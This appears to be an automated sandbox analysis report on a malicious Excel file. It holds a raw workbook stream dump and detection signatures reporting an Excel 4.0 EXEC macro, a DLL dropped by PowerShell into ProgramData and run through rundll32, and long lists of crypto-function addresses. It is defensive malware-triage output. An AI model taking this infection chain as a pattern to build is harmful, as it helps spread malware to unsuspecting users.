Source: DOCUMENT_2801.xls Stream path 'Workbook' : ........ZO..........................\.p....xXx B.....a.........=...........................................=....... Xa&8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.*.h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q.*.6.._.-.*. .#.,.#.#.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0.\. .".. "._.-.;._.-.*. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._-* #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.*. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._-* #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-.......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ...ff....... ......+... ............ ......)... ............ ......,... ............ ......*... ............ .......... ............ .......... ............ .......... ....P....... .......... ....P....... .......... .... ....... .......... ............ .......... ............ .......... ....`....... .......... ............ .......... ............ .......... .......
Source: DOCUMENT_2801.xls.0.dr Stream path 'Workbook' : ........ZO..........................\.p....user B.....a.........=...........................................=....... Xa&8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.*.h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q.*.6.._.-.*. .#.,.#.#.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0.\. .".. "._.-.;._.-.*. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._-* #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.*. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._-* #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-.......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ...ff....... ......+... ............ ......)... ............ ......,... ............ ......*... ............ .......... ............ .......... ............ .......... ....P....... .......... ....P....... .......... .... ....... .......... ............ .......... ............ .......... ....`....... .......... ............ .......... ............ .......... .......
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\Milossd.dll Jump to dropped file
Found Excel 4.0 Macro with suspicious formulas
Source: DOCUMENT_2801.xls Initial sample: EXEC
Source: DOCUMENT_2801.xls Initial sample: EXEC
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10036007 11_2_10036007
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10041050 11_2_10041050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003130F 11_2_1003130F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_100323E2 11_2_100323E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10030460 11_2_10030460
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10041592 11_2_10041592
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003E59F 11_2_1003E59F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003960C 11_2_1003960C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_100317E2 11_2_100317E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10040B0E 11_2_10040B0E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10031BB6 11_2_10031BB6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10041C56 11_2_10041C56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10036CB5 11_2_10036CB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1001CD16 11_2_1001CD16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10042D21 11_2_10042D21
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10031FC2 11_2_10031FC2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002B9700 11_2_002B9700
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002C5CF9 11_2_002C5CF9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002C5040 11_2_002C5040
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002B6083 11_2_002B6083
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002C109E 11_2_002C109E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002B70ED 11_2_002B70ED
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002B911A 11_2_002B911A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002CA156 11_2_002CA156
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002BF154 11_2_002BF154
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002C41A7 11_2_002C41A7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002C9186 11_2_002C9186
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002C026B 11_2_002C026B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002BE243 11_2_002BE243
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002C129C 11_2_002C129C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002BC309 11_2_002BC309
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002CC38F 11_2_002CC38F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002CB391 11_2_002CB391
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002CD3C8 11_2_002CD3C8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002C542E 11_2_002C542E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002CA429 11_2_002CA429
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002BB41A 11_2_002BB41A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002D146E 11_2_002D146E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002C04B8 11_2_002C04B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002CE498 11_2_002CE498
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002B44FA 11_2_002B44FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002C64F1 11_2_002C64F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002C74DD 11_2_002C74DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002D04DE 11_2_002D04DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002C3512 11_2_002C3512
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002BF58F 11_2_002BF58F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002C45CD 11_2_002C45CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002C363D 11_2_002C363D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002C561F 11_2_002C561F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002D3672 11_2_002D3672
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002B8650 11_2_002B8650
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002B472E 11_2_002B472E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002B777B 11_2_002B777B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002C2753 11_2_002C2753
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002BB821 11_2_002BB821
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002B2830 11_2_002B2830
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002C1831 11_2_002C1831
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002BE86A 11_2_002BE86A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002C6864 11_2_002C6864
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002D0867 11_2_002D0867
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002BC850 11_2_002BC850
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002B88F4 11_2_002B88F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002B68DE 11_2_002B68DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002CD8D7 11_2_002CD8D7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002BF93D 11_2_002BF93D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002B194C 11_2_002B194C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002C0946 11_2_002C0946
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002B1950 11_2_002B1950
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002CC9A9 11_2_002CC9A9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002C99AA 11_2_002C99AA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002D1993 11_2_002D1993
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002B6A1F 11_2_002B6A1F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002B9A7D 11_2_002B9A7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002BCA43 11_2_002BCA43
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002BAB66 11_2_002BAB66
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002BBB4B 11_2_002BBB4B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002D1B54 11_2_002D1B54
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002C4B56 11_2_002C4B56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002B7B82 11_2_002B7B82
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002CEBFF 11_2_002CEBFF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002C2BF6 11_2_002C2BF6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002C7BCA 11_2_002C7BCA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002B6C29 11_2_002B6C29
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002CCC89 11_2_002CCC89
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002BEC9B 11_2_002BEC9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002CACD3 11_2_002CACD3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002C0D33 11_2_002C0D33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002BBD0F 11_2_002BBD0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002C8D71 11_2_002C8D71
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002C3D41 11_2_002C3D41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002D0D5B 11_2_002D0D5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002BFD8C 11_2_002BFD8C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002B8D95 11_2_002B8D95
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002CBE8C 11_2_002CBE8C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002BAE9A 11_2_002BAE9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002CEE94 11_2_002CEE94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002B6ED6 11_2_002B6ED6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002CFF31 11_2_002CFF31
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002B2FA1 11_2_002B2FA1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002B3FB8 11_2_002B3FB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002B1F9B 11_2_002B1F9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002BCFCE 11_2_002BCFCE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00815483 12_2_00815483
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0082C089 12_2_0082C089
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0082B28C 12_2_0082B28C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0082E294 12_2_0082E294
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0081E09B 12_2_0081E09B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0082D898 12_2_0082D898
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0081A29A 12_2_0081A29A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0082049E 12_2_0082049E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0082069C 12_2_0082069C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0081F8B8 12_2_0081F8B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0082A0D3 12_2_0082A0D3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0082CCD7 12_2_0082CCD7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_008162D6 12_2_008162D6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0082F8DE 12_2_0082F8DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00815CDE 12_2_00815CDE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_008268DD 12_2_008268DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_008164ED 12_2_008164ED
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_008258F1 12_2_008258F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00817CF4 12_2_00817CF4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_008138FA 12_2_008138FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_008250F9 12_2_008250F9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0081A81A 12_2_0081A81A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00824A1F 12_2_00824A1F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00815E1F 12_2_00815E1F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0081AC21 12_2_0081AC21
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00816029 12_2_00816029
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00829829 12_2_00829829
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0082482E 12_2_0082482E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00811C30 12_2_00811C30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00820C31 12_2_00820C31
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00822A3D 12_2_00822A3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0081BE43 12_2_0081BE43
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00824440 12_2_00824440
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0081D643 12_2_0081D643
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0081BC50 12_2_0081BC50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00817A50 12_2_00817A50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0082FC67 12_2_0082FC67
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00825C64 12_2_00825C64
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0081F66B 12_2_0081F66B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0081DC6A 12_2_0081DC6A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0083086E 12_2_0083086E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00832A72 12_2_00832A72
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00818E7D 12_2_00818E7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00816F82 12_2_00816F82
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00828586 12_2_00828586
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0082B78F 12_2_0082B78F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0081F18C 12_2_0081F18C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0081E98F 12_2_0081E98F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00830D93 12_2_00830D93
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0082A791 12_2_0082A791
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00818195 12_2_00818195
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0081139B 12_2_0081139B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_008123A1 12_2_008123A1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_008235A7 12_2_008235A7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00828DAA 12_2_00828DAA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0082BDA9 12_2_0082BDA9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_008133B8 12_2_008133B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00826FCA 12_2_00826FCA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0082C7C8 12_2_0082C7C8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_008239CD 12_2_008239CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0081C3CE 12_2_0081C3CE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00821FF6 12_2_00821FF6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0082DFFF 12_2_0082DFFF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00818B00 12_2_00818B00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0081B709 12_2_0081B709
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0081B10F 12_2_0081B10F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00822912 12_2_00822912
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0081851A 12_2_0081851A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00813B2E 12_2_00813B2E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00820133 12_2_00820133
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0082F331 12_2_0082F331
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0081ED3D 12_2_0081ED3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00823141 12_2_00823141
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0081FD46 12_2_0081FD46
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0081AF4B 12_2_0081AF4B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00810D4C 12_2_00810D4C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00810D50 12_2_00810D50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00821B53 12_2_00821B53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00829556 12_2_00829556
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00823F56 12_2_00823F56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0081E554 12_2_0081E554
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00830F54 12_2_00830F54
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0083015B 12_2_0083015B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00819F66 12_2_00819F66
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00828171 12_2_00828171
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00816B7B 12_2_00816B7B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00745CF9 12_2_00745CF9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007370ED 12_2_007370ED
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007474DD 12_2_007474DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0074EE94 12_2_0074EE94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073EC9B 12_2_0073EC9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0074E498 12_2_0074E498
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0074BE8C 12_2_0074BE8C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00751B54 12_2_00751B54
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073F93D 12_2_0073F93D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00743512 12_2_00743512
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00739700 12_2_00739700
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0074B391 12_2_0074B391
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00738D95 12_2_00738D95
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00753672 12_2_00753672
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00739A7D 12_2_00739A7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00746864 12_2_00746864
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00750867 12_2_00750867
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073E86A 12_2_0073E86A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0075146E 12_2_0075146E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0074026B 12_2_0074026B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073C850 12_2_0073C850
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00738650 12_2_00738650
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073CA43 12_2_0073CA43
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073E243 12_2_0073E243
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00745040 12_2_00745040
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00732830 12_2_00732830
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00741831 12_2_00741831
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0074363D 12_2_0074363D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073B821 12_2_0073B821
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00736C29 12_2_00736C29
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0074542E 12_2_0074542E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0074A429 12_2_0074A429
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073B41A 12_2_0073B41A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0074561F 12_2_0074561F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00736A1F 12_2_00736A1F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007464F1 12_2_007464F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007388F4 12_2_007388F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007344FA 12_2_007344FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0074D8D7 12_2_0074D8D7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00736ED6 12_2_00736ED6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0074ACD3 12_2_0074ACD3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007504DE 12_2_007504DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007368DE 12_2_007368DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007404B8 12_2_007404B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0074129C 12_2_0074129C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073AE9A 12_2_0073AE9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0074109E 12_2_0074109E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00736083 12_2_00736083
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0074CC89 12_2_0074CC89
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00748D71 12_2_00748D71
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073777B 12_2_0073777B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073AB66 12_2_0073AB66
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0074A156 12_2_0074A156
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00744B56 12_2_00744B56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00731950 12_2_00731950
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073F154 12_2_0073F154
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00742753 12_2_00742753
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00750D5B 12_2_00750D5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00740946 12_2_00740946
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00743D41 12_2_00743D41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073BB4B 12_2_0073BB4B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073194C 12_2_0073194C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0074FF31 12_2_0074FF31
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00740D33 12_2_00740D33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073472E 12_2_0073472E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073911A 12_2_0073911A
